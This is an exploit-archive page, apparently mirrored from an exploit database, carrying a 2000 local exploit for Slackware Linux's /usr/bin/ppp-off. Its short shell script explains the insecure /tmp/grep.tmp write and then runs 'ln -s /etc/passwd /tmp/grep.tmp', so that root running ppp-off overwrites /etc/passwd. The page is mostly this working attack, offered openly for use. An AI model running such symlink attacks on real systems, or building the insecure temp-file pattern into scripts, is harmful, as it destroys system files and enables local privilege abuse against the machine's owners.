Slackware Linux /usr/bin/ppp-off Insecure /tmp Call Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Slackware Linux /usr/bin/ppp-off Insecure /tmp Call Exploit
# Published : 2000-11-17
# Author : sinfony
# Previous Title : HP-UX 11.00/10.20 crontab Overwrite Files Exploit
# Next Title : Allegro RomPager 2.10 Malformed URL Request DoS Vulnerability

#!/bin/sh
#
# In SlackWare Linux the script /usr/bin/ppp-off writes the
# output of 'ps x' to /tmp/grep.tmp. Since root is the user
# that runs ppp-off,  a non-privileged  user could create a
# link from /tmp/grep.tmp to any file(ie: /etc/issue), thus
# when root runs the  ppp-off script, the  output of 'ps x'
# would be put in the linked file. 
#                                                   sinfony

ln -s /etc/passwd /tmp/grep.tmp


# www.Syue.com [2000-11-17]